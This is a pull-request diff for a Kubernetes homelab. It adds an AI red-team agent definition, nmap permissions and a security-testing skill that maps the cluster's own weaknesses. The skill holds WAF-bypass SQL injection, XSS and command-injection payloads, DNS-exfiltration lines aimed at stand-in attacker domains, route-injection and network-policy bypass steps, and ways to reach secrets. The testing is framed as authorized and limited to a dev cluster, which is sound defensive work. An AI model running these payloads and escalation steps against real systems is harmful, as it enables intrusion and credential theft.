### PR TITLE
feat(platform): add security-tester agent for adversarial red team exercises

### DIFF
--- a/.claude/agents/security-tester.md
+++ b/.claude/agents/security-tester.md
@@ -1,0 +1,121 @@
+---
+name: security-tester
+description: |
+  Adversarial security tester for authorized red team exercises against the homelab.
+  Probes network policies, authentication, authorization, and container security.
+  Read-only investigation with active testing permitted on dev cluster only.
+tools: Read, Grep, Glob, Bash, WebFetch, WebSearch
+model: opus
+skills:
+  - security-testing
+  - k8s
+  - network-policy
+  - prometheus
+  - loki
+  - sre
+  - gateway-routing
+memory: project
+---
+
+# Role
+
+You are an **adversarial security tester** conducting authorized red team exercises against a bare-metal Kubernetes homelab running Talos, Flux, Cilium, and Istio Ambient. Your mission is to **find real, exploitable vulnerabilities** — not theoretical risks. Think like an attacker who has gained an initial foothold and wants to escalate.
+
+You have deep expertise in:
+- Kubernetes security (RBAC escalation, pod escape, service account abuse)
+- Network policy evasion (Cilium CNP/CCNP bypass, lateral movement)
+- Web application security (WAF bypass, authentication flaws, session attacks)
+- Supply chain attacks (OCI artifact tampering, GitOps source manipulation)
+- Cloud credential theft (AWS IAM key exfiltration, SSM parameter access)
+
+# Rules of Engagement
+
+- **Scope**: Dev cluster for active exploitation. Read-only recon on integration/live
+- **Authorization**: This is the owner's infrastructure — full kubectl access to dev is authorized
+- **Goal**: Prioritized findings report with proof-of-concept exploitation steps
+- **Mindset**: Assume breach. Start from "I compromised one pod" and work outward
+- **No destruction**: Prove exploitability without breaking things — no data deletion, no state corruption, no resource exhaustion
+- **Evidence over theory**: Every finding must include commands that demonstrate the vulnerability. "Could potentially" is not a finding — "here's the curl command that proves it" is
+
+# Engagement Protocol
+
+## 1. Scope Confirmation
+
+Before any testing, confirm with the user:
+- **Which cluster?** (dev for active testing, integration/live for recon only)
+- **Which attack phases?** (recon, network, auth, escalation, exfiltration, supply chain)
+- **Any exclusions?** (services to avoid, time constraints)
+- **Finding threshold?** (all findings vs critical/high only)
+
+Use `AskUserQuestion` to establish scope. Never begin testing without explicit confirmation.
+
+## 2. Passive Reconnaissance
+
+Map the attack surface without triggering alerts. Use the `security-testing` skill for the known attack surface inventory. Verify each item against the live cluster — the codebase may have drifted from deployed state.
+
+Collect:
+- Namespace inventory with network policy profiles and access labels
+- All HTTPRoutes on both gateways (external + internal)
+- ServiceAccounts with automounted tokens and their RBAC bindings
+- Secrets inventory per namespace
+- Container security contexts (who runs as root, what capabilities)
+- Istio mesh enrollment (who's opted out)
+
+## 3. Active Testing (Dev Cluster Only)
+
+Execute attack scenarios from the `security-testing` skill. For each test:
+
+1. **State the hypothesis**: "I believe X is exploitable because Y"
+2. **Run the test**: Execute the specific commands
+3. **Record the result**: What actually happened (pass/fail with evidence)
+4. **Assess detection**: Did any alert fire? Would monitoring catch this?
+
+Always use `KUBECONFIG=~/.kube/dev.yaml` for active tests. Double-check before every command.
+
+## 4. Findings Report
+
+Present each finding in this structure:
+
+```
+### Finding: [Title]
+- **Severity**: Critical / High / Medium / Low / Informational
+- **CVSS-like Score**: [Attack Vector / Complexity / Privileges Required / Impact]
+- **Proof of Concept**:
+  ```bash
+  # Exact commands to reproduce
+  ```
+- **Impact**: What an attacker gains from this
+- **Detection Gap**: Would current alerts/monitoring catch this? Which ones?
+- **Affected Components**: Namespaces, pods, services, configs
+- **Remediation**: Specific config/code changes to fix this
+- **References**: CIS benchmarks, OWASP, or other standards this violates
+```
+
+Prioritize findings by: **exploitability x impact x detection gap**.
+
+## 5. Summary
+
+After all phases, produce an executive summary:
+- Total findings by severity
+- Top 3 most critical attack paths (chain multiple findings)
+- Overall security posture assessment
+- Prioritized remediation roadmap
+
+# Testing Boundaries
+
+- **Dev cluster**: Active exploitation permitted — deploy test pods, create HTTPRoutes, test network escapes, probe services
+- **Integration/live**: Read-only reconnaissance — enumerate resources, check configurations, verify labels. No active probing
+- **NEVER** exfiltrate real credentials to external systems
+- **NEVER** run denial-of-service attacks or resource exhaustion tests
+- **NEVER** modify or delete existing resources (create new test resources instead)
+- **NEVER** access other people's data in application databases
+- **NEVER** test against external services (GitHub OAuth, Let's Encrypt, AWS) — only test local cluster components
+- Clean up all test resources (pods, HTTPRoutes, etc.) after each test phase
+
+# User Interaction
+
+- Use `AskUserQuestion` to confirm scope before starting
+- Present intermediate findings as you go — don't wait until the end
+- When a finding is Critical or High, flag it immediately
+- When multiple attack paths exist, ask which to pursue first
+- If a test could be disruptive (even on dev), confirm before executing

--- a/.claude/commands/security-test.md
+++ b/.claude/commands/security-test.md
@@ -1,0 +1,1 @@
+Delegate this task to the `security-tester` agent. Pass the user's test scope: `$ARGUMENTS`

--- a/.claude/settings.json
+++ b/.claude/settings.json
@@ -89,7 +89,10 @@
       "Skill(cnpg-database)",
       "Skill(gateway-routing)",
       "Skill(promotion-pipeline)",
-      "Skill(versions-renovate)"
+      "Skill(versions-renovate)",
+      "Skill(security-testing)",
+      "Bash(hubble:*)",
+      "Bash(nmap:*)"
     ]
   },
   "enabledPlugins": {

--- a/.claude/skills/CLAUDE.md
+++ b/.claude/skills/CLAUDE.md
@@ -33,6 +33,7 @@ These skills are composed by agents internally. They are not invoked directly by
 | `sync-claude` | Validate Claude docs against codebase state | orchestrator | - | discover-claude-docs.sh, extract-references.sh |
 | `taskfiles` | Task runner syntax, patterns, and conventions | implementer | schema.md, cli.md, styleguide.md, task-catalog.md | - |
 | `terragrunt` | Infrastructure operations with Terragrunt/OpenTofu | implementer | stacks.md, units.md | - |
+| `security-testing` | Adversarial security testing methodology and attack surface inventory | security-tester | attack-surface.md | - |
 | `versions-renovate` | Version management and Renovate annotation configuration | implementer | - | - |
 
 ---
@@ -219,6 +220,7 @@ Agents are defined in `.claude/agents/` and compose skills for their domain:
 | `troubleshooter` | SRE debugging specialist | sre, k8s, loki, prometheus, promotion-pipeline, network-policy | inherit | default (read-only tools) |
 | `implementer` | Platform engineer | flux-gitops, app-template, terragrunt, opentofu-modules, deploy-app, taskfiles, k8s, secrets, monitoring-authoring, cnpg-database, gateway-routing, versions-renovate, kubesearch, promotion-pipeline, gha-pipelines, network-policy | inherit | default (full tools) |
 | `designer` | Principal architect | kubesearch, architecture-review, k8s | opus | plan (read-only) |
+| `security-tester` | Adversarial red team tester | security-testing, k8s, network-policy, prometheus, loki, sre, gateway-routing | opus | default (read-only tools) |
 
 ---
 

--- a/.claude/skills/security-testing/SKILL.md
+++ b/.claude/skills/security-testing/SKILL.md
@@ -1,0 +1,437 @@
+---
+name: security-testing
+description: |
+  Adversarial security testing methodology for the Kubernetes homelab. Covers network policy
+  evasion, authentication bypass, privilege escalation, credential theft, and supply chain attacks.
+
+  Use when: (1) Red team testing against the homelab, (2) Validating network policy enforcement,
+  (3) Testing WAF bypass on external gateway, (4) Probing authentication layers,
+  (5) Assessing container escape paths, (6) Auditing RBAC and service accounts,
+  (7) Testing supply chain security of OCI promotion pipeline.
+
+  Triggers: "security test", "red team", "pentest", "penetration test", "attack surface",
+  "WAF bypass", "network policy evasion", "privilege escalation", "lateral movement",
+  "credential theft", "container escape", "RBAC audit", "security audit", "vulnerability"
+user-invocable: false
+---
+
+# Security Testing Methodology
+
+## Attack Surface Overview
+
+This homelab has six primary attack layers. See [references/attack-surface.md](references/attack-surface.md) for the full inventory of known weaknesses per layer.
+
+| Layer | Controls | Key Weaknesses |
+|-------|----------|----------------|
+| **Network** | Cilium default-deny, profile CCNPs | Prometheus scrape baseline (any port), escape hatch window, intra-namespace freedom |
+| **Gateway** | Coraza WAF, Istio Gateway API | WAF FAIL_OPEN, PL1 bypass, gateway `allowedRoutes.from: All` |
+| **Authentication** | OAuth2-Proxy, Authelia 2FA, app-native | 7-day cookie, brute force window, Vaultwarden admin redirect bypass |
+| **Authorization** | PodSecurity admission, RBAC | Minimal custom RBAC, homepage ClusterRole reads cluster |
+| **Container** | Security contexts, Istio mTLS | Gluetun root+NET_ADMIN+no mesh, Cilium agent SYS_ADMIN |
+| **Supply chain** | OCI promotion, Flux GitOps | Integration auto-deploy, PXE shell option |
+
+---
+
+## Phase 1: Network Policy Testing
+
+### 1.1 Intra-Namespace Lateral Movement
+
+The `baseline-intra-namespace` CCNP allows free communication within any namespace. Prove lateral movement:
+
+```bash
+# Deploy a test pod in a multi-service namespace
+KUBECONFIG=~/.kube/dev.yaml kubectl run sectest --image=nicolaka/netshoot -n <target-ns> -- sleep 3600
+
+# From the test pod, scan all services in the namespace
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n <target-ns> sectest -- nmap -sT -p- <service-cluster-ip>
+
+# Prove access to any port within the namespace
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n <target-ns> sectest -- curl -s http://<other-pod-ip>:<any-port>
+```
+
+**Expected result**: Full access to every pod and port within the same namespace.
+
+### 1.2 Cross-Namespace Escape
+
+Test profile boundaries — a pod in `isolated` should only reach DNS:
+
+```bash
+# Deploy in an isolated-profile namespace
+KUBECONFIG=~/.kube/dev.yaml kubectl run sectest --image=nicolaka/netshoot -n <isolated-ns> -- sleep 3600
+
+# Attempt cross-namespace reach (should be blocked)
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n <isolated-ns> sectest -- curl -s --connect-timeout 3 http://<pod-in-other-ns>:<port>
+
+# Attempt internet egress (should be blocked — only DNS allowed)
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n <isolated-ns> sectest -- curl -s --connect-timeout 3 https://httpbin.org/ip
+
+# DNS exfiltration test (always works — baseline allows DNS)
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n <isolated-ns> sectest -- nslookup exfil-test.attacker.example.com
+```
+
+### 1.3 Prometheus Label Impersonation
+
+**CRITICAL**: The `baseline-prometheus-scrape` CCNP allows the Prometheus pod to reach ANY pod on ANY port with no `toPorts` restriction. Test if label matching is sufficient:
+
+```bash
+# Check what labels the scrape baseline matches on
+KUBECONFIG=~/.kube/dev.yaml kubectl get ccnp baseline-prometheus-scrape -o yaml
+
+# Deploy a pod with the Prometheus label in a test namespace
+KUBECONFIG=~/.kube/dev.yaml kubectl run fake-prom --image=nicolaka/netshoot -n <test-ns> \
+  --labels="app.kubernetes.io/name=prometheus" -- sleep 3600
+
+# From fake-prom, attempt cross-namespace access
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n <test-ns> fake-prom -- curl -s --connect-timeout 3 http://<target-pod>:<port>
+```
+
+**What to check**: Does the CCNP use `fromEndpoints` with namespace scoping (e.g., `io.kubernetes.pod.namespace: monitoring`), or just label matching? If namespace-scoped, impersonation fails. If label-only, any pod with the right label bypasses network policies.
+
+### 1.4 Escape Hatch Abuse
+
+Test the RBAC requirements for triggering the escape hatch:
+
+```bash
+# Check who can label namespaces
+KUBECONFIG=~/.kube/dev.yaml kubectl auth can-i update namespaces --as=system:serviceaccount:<ns>:<sa>
+
+# List all ClusterRoleBindings that grant namespace update
+KUBECONFIG=~/.kube/dev.yaml kubectl get clusterrolebindings -o json | \
+  jq '.items[] | select(.roleRef.name | test("admin|edit|cluster-admin")) | {name: .metadata.name, subjects: .subjects}'
+
+# If a SA has permission, test the escape hatch
+KUBECONFIG=~/.kube/dev.yaml kubectl label namespace <test-ns> network-policy.homelab/enforcement=disabled
+
+# Verify: all traffic now allowed
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n <test-ns> sectest -- curl -s --connect-timeout 3 http://<any-pod>:<any-port>
+
+# CLEANUP: Re-enable immediately (alert fires at 5 minutes)
+KUBECONFIG=~/.kube/dev.yaml kubectl label namespace <test-ns> network-policy.homelab/enforcement-
+```
+
+### 1.5 Gateway Route Injection
+
+Both gateways have `allowedRoutes.namespaces.from: All`. Any namespace can attach an HTTPRoute:
+
+```bash
+# Create a rogue HTTPRoute exposing an internal service through the external gateway
+cat <<'EOF' | KUBECONFIG=~/.kube/dev.yaml kubectl apply -f -
+apiVersion: gateway.networking.k8s.io/v1
+kind: HTTPRoute
+metadata:
+  name: sectest-route-injection
+  namespace: <test-ns>
+spec:
+  parentRefs:
+    - name: external
+      namespace: istio-gateway
+  hostnames:
+    - "sectest.dev.tomnowak.work"
+  rules:
+    - backendRefs:
+        - name: <internal-service>
+          port: <port>
+EOF
+
+# Test if the route is active
+curl -k --resolve "sectest.dev.tomnowak.work:443:<external-ip>" https://sectest.dev.tomnowak.work/
+
+# CLEANUP
+KUBECONFIG=~/.kube/dev.yaml kubectl delete httproute sectest-route-injection -n <test-ns>
+```
+
+---
+
+## Phase 2: Authentication & WAF Testing
+
+### 2.1 Coraza WAF Bypass (External Gateway)
+
+The WAF runs OWASP CRS at **Paranoia Level 1** (lowest). Test bypass techniques:
+
+```bash
+# Get the external gateway IP
+EXTERNAL_IP=$(KUBECONFIG=~/.kube/dev.yaml kubectl get svc -n istio-gateway external -o jsonpath='{.status.loadBalancer.ingress[0].ip}')
+
+# Basic SQL injection (should be blocked at PL1)
+curl -k --resolve "vault.dev.tomnowak.work:443:${EXTERNAL_IP}" \
+  "https://vault.dev.tomnowak.work/?id=1'+OR+1=1--"
+
+# Double-encoding bypass attempt
+curl -k --resolve "vault.dev.tomnowak.work:443:${EXTERNAL_IP}" \
+  "https://vault.dev.tomnowak.work/?id=1%2527+OR+1%253D1--"
+
+# Chunked transfer encoding (splits signature across chunks)
+curl -k --resolve "vault.dev.tomnowak.work:443:${EXTERNAL_IP}" \
+  -H "Transfer-Encoding: chunked" \
+  -d $'3\r\nid=\r\n9\r\n1\' OR 1=\r\n2\r\n1-\r\n1\r\n-\r\n0\r\n\r\n' \
+  "https://vault.dev.tomnowak.work/"
+
+# JSON body (PL1 has limited JSON inspection)
+curl -k --resolve "vault.dev.tomnowak.work:443:${EXTERNAL_IP}" \
+  -H "Content-Type: application/json" \
+  -d '{"search":"1\u0027 OR 1=1--"}' \
+  "https://vault.dev.tomnowak.work/api/test"
+
+# XSS via uncommon encoding
+curl -k --resolve "vault.dev.tomnowak.work:443:${EXTERNAL_IP}" \
+  "https://vault.dev.tomnowak.work/?q=%3Csvg%20onload%3Dalert(1)%3E"
+
+# Command injection
+curl -k --resolve "vault.dev.tomnowak.work:443:${EXTERNAL_IP}" \
+  "https://vault.dev.tomnowak.work/?cmd=;cat+/etc/passwd"
+```
+
+### 2.2 WAF FAIL_OPEN Verification
+
+The WAF uses `failStrategy: FAIL_OPEN`. If the WASM module is unavailable, all filtering stops:
+
+```bash
+# Check if the WasmPlugin is healthy
+KUBECONFIG=~/.kube/dev.yaml kubectl get wasmplugin -n istio-gateway -o yaml
+
+# Check if Coraza metrics are being emitted (absence = degraded/fail-open)
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n monitoring prometheus-kube-prometheus-stack-0 -c prometheus -- \
+  wget -qO- 'http://localhost:9090/api/v1/query?query=coraza_waf_requests_total' | jq '.data.result | length'
+
+# If length is 0, WAF may be in fail-open state — verify with a known-bad request
+```
+
+### 2.3 Vaultwarden Admin Panel Access
+
+The HTTPRoute redirects `/admin` to `/`. Test bypass from within the cluster:
+
+```bash
+# Direct pod access (bypasses gateway entirely)
+VW_POD=$(KUBECONFIG=~/.kube/dev.yaml kubectl get pods -n vaultwarden -l app.kubernetes.io/name=vaultwarden -o jsonpath='{.items[0].metadata.name}')
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n <test-ns> sectest -- curl -s -I http://${VW_POD_IP}:8080/admin
+
+# Path variations against the gateway
+curl -k --resolve "vault.dev.tomnowak.work:443:${EXTERNAL_IP}" -I "https://vault.dev.tomnowak.work/admin/"
+curl -k --resolve "vault.dev.tomnowak.work:443:${EXTERNAL_IP}" -I "https://vault.dev.tomnowak.work/Admin"
+curl -k --resolve "vault.dev.tomnowak.work:443:${EXTERNAL_IP}" -I "https://vault.dev.tomnowak.work/ADMIN"
+curl -k --resolve "vault.dev.tomnowak.work:443:${EXTERNAL_IP}" -I "https://vault.dev.tomnowak.work//admin"
+curl -k --resolve "vault.dev.tomnowak.work:443:${EXTERNAL_IP}" -I "https://vault.dev.tomnowak.work/admin?x=1"
+```
+
+### 2.4 OAuth2-Proxy Cookie Analysis
+
+```bash
+# Inspect cookie attributes from OAuth2-Proxy
+curl -k --resolve "prometheus.internal.dev.tomnowak.work:443:<internal-ip>" \
+  -c - "https://prometheus.internal.dev.tomnowak.work/" 2>/dev/null | grep oauth2
+
+# Check cookie scope (domain, path, secure, httponly, samesite)
+# 7-day expiry (168h) — can a captured cookie be replayed from a different client?
+```
+
+### 2.5 Authelia Brute Force Window
+
+3 retries in 2 minutes, 5-minute ban. Test the boundaries:
+
+```bash
+# Is the ban per-IP or per-user?
+# Test: Same user from different source IPs
+# Test: Slow credential stuffing (1 attempt per 2 minutes stays under radar)
+# Test: Does the ban apply to OIDC authorization flows or only direct login?
+
+# Check Authelia regulation config
+KUBECONFIG=~/.kube/dev.yaml kubectl get configmap -n authelia -o yaml | grep -A5 regulation
+```
+
+---
+
+## Phase 3: Privilege Escalation
+
+### 3.1 Service Account Token Enumeration
+
+```bash
+# List all service accounts with automounted tokens
+KUBECONFIG=~/.kube/dev.yaml kubectl get pods -A -o json | \
+  jq '.items[] | select(.spec.automountServiceAccountToken != false) | {ns: .metadata.namespace, pod: .metadata.name, sa: .spec.serviceAccountName}'
+
+# Check RBAC permissions for a specific service account
+KUBECONFIG=~/.kube/dev.yaml kubectl auth can-i --list --as=system:serviceaccount:<ns>:<sa>
+
+# Particularly interesting: homepage SA has cluster-wide read
+KUBECONFIG=~/.kube/dev.yaml kubectl auth can-i --list --as=system:serviceaccount:homepage:homepage
+```
+
+### 3.2 Container Security Audit
+
+```bash
+# Find containers running as root
+KUBECONFIG=~/.kube/dev.yaml kubectl get pods -A -o json | \
+  jq '.items[] | .spec.containers[] | select(.securityContext.runAsUser == 0 or .securityContext.runAsNonRoot == false) | {pod: .name, user: .securityContext.runAsUser}'
+
+# Find containers with elevated capabilities
+KUBECONFIG=~/.kube/dev.yaml kubectl get pods -A -o json | \
+  jq '.items[] | .spec.containers[] | select(.securityContext.capabilities.add != null) | {pod: .name, caps: .securityContext.capabilities.add}'
+
+# Find containers with writable root filesystem
+KUBECONFIG=~/.kube/dev.yaml kubectl get pods -A -o json | \
+  jq '.items[] | .spec.containers[] | select(.securityContext.readOnlyRootFilesystem != true) | {pod: .name, readonly: .securityContext.readOnlyRootFilesystem}'
+
+# Find pods opted out of Istio mesh (no mTLS)
+KUBECONFIG=~/.kube/dev.yaml kubectl get pods -A -o json | \
+  jq '.items[] | select(.metadata.annotations["istio.io/dataplane-mode"] == "none") | {ns: .metadata.namespace, pod: .metadata.name}'
+```
+
+### 3.3 Crown Jewel: AWS IAM Key
+
+The `external-secrets-access-key` in `kube-system` is a static AWS IAM key with read access to all SSM parameters:
+
+```bash
+# Check if any non-system service account can read secrets in kube-system
+KUBECONFIG=~/.kube/dev.yaml kubectl auth can-i get secrets -n kube-system --as=system:serviceaccount:<ns>:<sa>
+
+# Check the External Secrets operator RBAC
+KUBECONFIG=~/.kube/dev.yaml kubectl get clusterrolebindings -o json | \
+  jq '.items[] | select(.subjects[]?.name | test("external-secrets")) | {name: .metadata.name, role: .roleRef.name}'
+
+# What SSM paths does this key unlock?
+# /homelab/kubernetes/${cluster_name}/* — includes Cloudflare API token, GitHub OAuth secrets,
+# NordVPN credentials, Istio mesh CA private key
+```
+
+### 3.4 Garage S3 Admin API from Gateway
+
+```bash
+# The Garage admin API (port 3903) is accessible from istio-gateway namespace
+# Deploy a test pod in the gateway namespace (if RBAC allows)
+# Or check if the gateway pods themselves can reach it
+
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n istio-gateway <gateway-pod> -- \
+  curl -s --connect-timeout 3 http://garage.garage.svc.cluster.local:3903/health
+
+# If reachable, try admin operations
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n istio-gateway <gateway-pod> -- \
+  curl -s http://garage.garage.svc.cluster.local:3903/v1/status
+```
+
+---
+
+## Phase 4: Data Exfiltration Paths
+
+### 4.1 DNS Tunneling (Universal)
+
+Every pod can reach DNS. This is an always-available exfiltration channel:
+
+```bash
+# Prove DNS tunneling works even from isolated namespaces
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n <isolated-ns> sectest -- \
+  nslookup $(echo "sensitive-data" | base64).exfil.example.com
+
+# The query will fail to resolve, but the DNS query itself is the exfiltration
+# Monitoring would need to watch for unusual DNS query patterns
+```
+
+### 4.2 Prometheus as Intelligence Source
+
+```bash
+# Service topology (who talks to whom)
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n monitoring prometheus-kube-prometheus-stack-0 -c prometheus -- \
+  wget -qO- 'http://localhost:9090/api/v1/query?query=istio_requests_total' | jq '.data.result[] | {src: .metric.source_workload, dst: .metric.destination_workload}'
+
+# Secret rotation timing
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n monitoring prometheus-kube-prometheus-stack-0 -c prometheus -- \
+  wget -qO- 'http://localhost:9090/api/v1/query?query=certmanager_certificate_expiration_timestamp_seconds' | jq '.data.result'
+
+# Node inventory with IPs
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n monitoring prometheus-kube-prometheus-stack-0 -c prometheus -- \
+  wget -qO- 'http://localhost:9090/api/v1/query?query=kube_node_info' | jq '.data.result[] | .metric'
+```
+
+### 4.3 Log Injection via Loki
+
+```bash
+# Can any pod send logs to Loki? (monitoring CNP allows fromEntities: cluster on port 3100)
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n <any-ns> sectest -- \
+  curl -s --connect-timeout 3 http://loki-headless.monitoring.svc.cluster.local:3100/ready
+
+# If reachable, inject a crafted log entry
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n <any-ns> sectest -- \
+  curl -s -X POST http://loki-headless.monitoring.svc.cluster.local:3100/loki/api/v1/push \
+  -H "Content-Type: application/json" \
+  -d '{"streams":[{"stream":{"job":"injected","namespace":"security-test"},"values":[["'$(date +%s)000000000'","SECURITY TEST: Log injection successful"]]}]}'
+
+# Check if the injected log appears
+# This proves any pod can write arbitrary log entries to Loki
+```
+
+---
+
+## Phase 5: Supply Chain
+
+### 5.1 Flux Source Manipulation
+
+```bash
+# Check what Git/OCI sources Flux is watching
+KUBECONFIG=~/.kube/dev.yaml flux get sources all
+
+# Check GitHub token permissions (stored in flux-system namespace)
+KUBECONFIG=~/.kube/dev.yaml kubectl get secret -n flux-system -o json | \
+  jq '.items[] | select(.metadata.name | test("github|flux")) | .metadata.name'
+
+# Check if webhook receivers are exposed
+KUBECONFIG=~/.kube/dev.yaml kubectl get receivers -n flux-system
+```
+
+### 5.2 PXE Boot Attack Surface
+
+```bash
+# Check PXE boot server accessibility from pod network
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n <any-ns> sectest -- \
+  curl -s --connect-timeout 3 http://pxe-boot.pxe-boot.svc.cluster.local/
+
+# Check if iPXE menu is accessible
+KUBECONFIG=~/.kube/dev.yaml kubectl exec -n <any-ns> sectest -- \
+  curl -s --connect-timeout 3 http://pxe-boot.pxe-boot.svc.cluster.local/boot.ipxe
+```
+
+---
+
+## Test Resource Cleanup
+
+**Always clean up after testing.** Run this after each session:
+
+```bash
+# Delete test pods
+KUBECONFIG=~/.kube/dev.yaml kubectl delete pod sectest -n <ns> --ignore-not-found
+KUBECONFIG=~/.kube/dev.yaml kubectl delete pod fake-prom -n <ns> --ignore-not-found
+
+# Delete test HTTPRoutes
+KUBECONFIG=~/.kube/dev.yaml kubectl delete httproute sectest-route-injection -n <ns> --ignore-not-found
+
+# Re-enable network policy enforcement if disabled
+KUBECONFIG=~/.kube/dev.yaml kubectl label namespace <ns> network-policy.homelab/enforcement- 2>/dev/null
+
+# Verify no test resources remain
+KUBECONFIG=~/.kube/dev.yaml kubectl get pods -A | grep sectest
+KUBECONFIG=~/.kube/dev.yaml kubectl get httproute -A | grep sectest
+```
+
+---
+
+## Finding Severity Guide
+
+| Severity | Criteria | Example |
+|----------|----------|---------|
+| **Critical** | Remote code execution, credential theft, cluster takeover | AWS IAM key exfiltration, container escape to host |
+| **High** | Authentication bypass, cross-namespace data access, privilege escalation | WAF bypass + unauthenticated admin access, RBAC escalation to read secrets |
+| **Medium** | Information disclosure, policy bypass with limited impact | Prometheus intel gathering, intra-namespace lateral movement |
+| **Low** | Minor policy gap, defense-in-depth weakness | DNS tunneling availability, 7-day cookie lifetime |
+| **Informational** | Design observation, best practice deviation | FAIL_OPEN strategy (documented and accepted), PL1 WAF level |
+
+---
+
+## Cross-References
+
+- [references/attack-surface.md](references/attack-surface.md) — Full inventory of known attack surfaces
+- [network-policy SKILL](../network-policy/SKILL.md) — Cilium policy architecture and debugging
+- [gateway-routing SKILL](../gateway-routing/SKILL.md) — Gateway API, TLS, and WAF configuration
+- [sre SKILL](../sre/SKILL.md) — Kubernetes debugging methodology
+- [k8s SKILL](../k8s/SKILL.md) — Cluster access and kubectl patterns
+
+## Keywords
+
+security testing, red team, penetration testing, network policy evasion, WAF bypass, authentication bypass, privilege escalation, lateral movement, container escape, RBAC audit, credential theft, supply chain attack, DNS tunneling, log injection

--- a/.claude/skills/security-testing/references/attack-surface.md
+++ b/.claude/skills/security-testing/references/attack-surface.md
@@ -1,0 +1,222 @@
+# Homelab Attack Surface Inventory
+
+Known weaknesses and attack vectors specific to this homelab infrastructure. Each entry includes the design rationale (when it's intentional) and exploitation potential.
+
+---
+
+## Network Layer
+
+### NET-001: Prometheus Scrape Baseline — Unrestricted Port Access
+
+**Component**: `baseline-prometheus-scrape` CCNP
+**Path**: `kubernetes/platform/config/network-policy/baselines/`
+
+The Prometheus scrape baseline allows the Prometheus pod to reach ANY pod on ANY port cluster-wide. The `fromEndpoints` selector matches on pod labels without `toPorts` restriction.
+
+- **Exploitation**: If a pod can impersonate the Prometheus label (`app.kubernetes.io/name=prometheus`), it bypasses all network policies for egress
+- **Mitigation check**: Does the CCNP scope to `io.kubernetes.pod.namespace: monitoring`? If yes, label impersonation is insufficient
+- **Severity**: High (if namespace-unscoped) / Low (if namespace-scoped)
+
+### NET-002: Escape Hatch 5-Minute Detection Window
+
+**Component**: `escape-hatch-allow-all` CCNP + `NetworkPolicyEnforcementDisabled` alert
+**Path**: `kubernetes/platform/config/network-policy/baselines/escape-hatch-allow-all.yaml`
+
+Labeling a namespace `network-policy.homelab/enforcement=disabled` grants unrestricted traffic. The alert only fires after 5 minutes.
+
+- **Exploitation**: 5-minute window of unrestricted access before detection
+- **RBAC requirement**: Must be able to label namespaces (check which SAs have this)
+- **Design rationale**: Intentional emergency escape hatch
+- **Severity**: Medium (requires namespace label RBAC)
+
+### NET-003: Intra-Namespace Free Communication
+
+**Component**: `baseline-intra-namespace` CCNP
+**Path**: `kubernetes/platform/config/network-policy/baselines/intra-namespace.yaml`
+
+All pods within a namespace can communicate freely on any port.
+
+- **Exploitation**: Compromise one pod → lateral movement to all pods in the namespace
+- **Design rationale**: Intentional — simplifies service-to-service communication
+- **Severity**: Medium (limited to namespace scope)
+
+### NET-004: DNS Always Available (Tunneling)
+
+**Component**: `baseline-dns-egress` CCNP
+
+Every pod can reach DNS (UDP/TCP 53). DNS tunneling encodes arbitrary data in subdomain queries.
+
+- **Exploitation**: Data exfiltration from any pod, including `isolated` profile
+- **Design rationale**: DNS is required for basic Kubernetes operation
+- **Detection**: Would require DNS query anomaly detection (not currently monitored)
+- **Severity**: Low (slow, detectable with proper monitoring)
+
+---
+
+## Gateway Layer
+
+### GW-001: WAF FAIL_OPEN Strategy
+
+**Component**: Coraza WasmPlugin on external gateway
+**Path**: `kubernetes/platform/config/gateway-routing/`
+
+The WAF uses `failStrategy: FAIL_OPEN`. If the WASM module is unavailable (OCI pull failure, crash, resource exhaustion), all traffic flows unfiltered.
+
+- **Exploitation**: Cause WAF module failure → all external traffic bypasses WAF
+- **Alert**: `CorazaWAFDegraded` monitors for missing metrics, but doesn't detect the specific fail-open condition
+- **Design rationale**: Documented choice — "availability over security"
+- **Severity**: High (removes entire WAF layer)
+
+### GW-002: Paranoia Level 1 (Lowest WAF Sensitivity)
+
+**Component**: Coraza CRS configuration
+
+OWASP CRS at PL1 has limited coverage. Known bypasses include double-encoding, chunked transfer, unicode normalization, and JSON payload injection.
+
+- **Exploitation**: Standard WAF bypass techniques against PL1
+- **Design rationale**: PL1 minimizes false positives for a homelab
+- **Severity**: Medium (WAF still catches basic attacks)
+
+### GW-003: Gateway allowedRoutes.from: All
+
+**Component**: Both Istio Gateways (external + internal)
+
+Any namespace can attach an HTTPRoute to either gateway, potentially exposing internal services externally.
+
+- **Exploitation**: Create an HTTPRoute in any namespace → expose arbitrary backend through the gateway
+- **RBAC requirement**: Must be able to create HTTPRoute resources
+- **Severity**: High (can expose internal services to the internet)
+
+---
+
+## Authentication Layer
+
+### AUTH-001: OAuth2-Proxy 7-Day Cookie
+
+**Component**: OAuth2-Proxy configuration
+
+The `_oauth2_proxy` cookie has a 168-hour (7-day) lifetime with `SameSite=Lax`.
+
+- **Exploitation**: Captured cookie is valid for 7 days. `SameSite=Lax` allows replay from cross-site GET requests
+- **Severity**: Low (requires cookie capture, which requires separate vulnerability)
+
+### AUTH-002: Vaultwarden Admin Redirect is Gateway-Level
+
+**Component**: Vaultwarden HTTPRoute
+
+The `/admin` path is redirected to `/` via HTTPRoute filter. The Vaultwarden pod still serves the admin endpoint.
+
+- **Exploitation**: Direct pod access (bypassing gateway) reaches `/admin`. Path variations (`/admin/`, `/Admin`) may bypass the redirect
+- **Severity**: Medium (requires intra-cluster access or path bypass)
+
+### AUTH-003: Authelia Brute Force Parameters
+
+**Component**: Authelia regulation config
+
+3 retries in 2 minutes, 5-minute ban. Alert at 30% failure rate over 10 minutes.
+
+- **Exploitation**: Slow credential stuffing (1 attempt per 2 minutes) stays under all detection thresholds
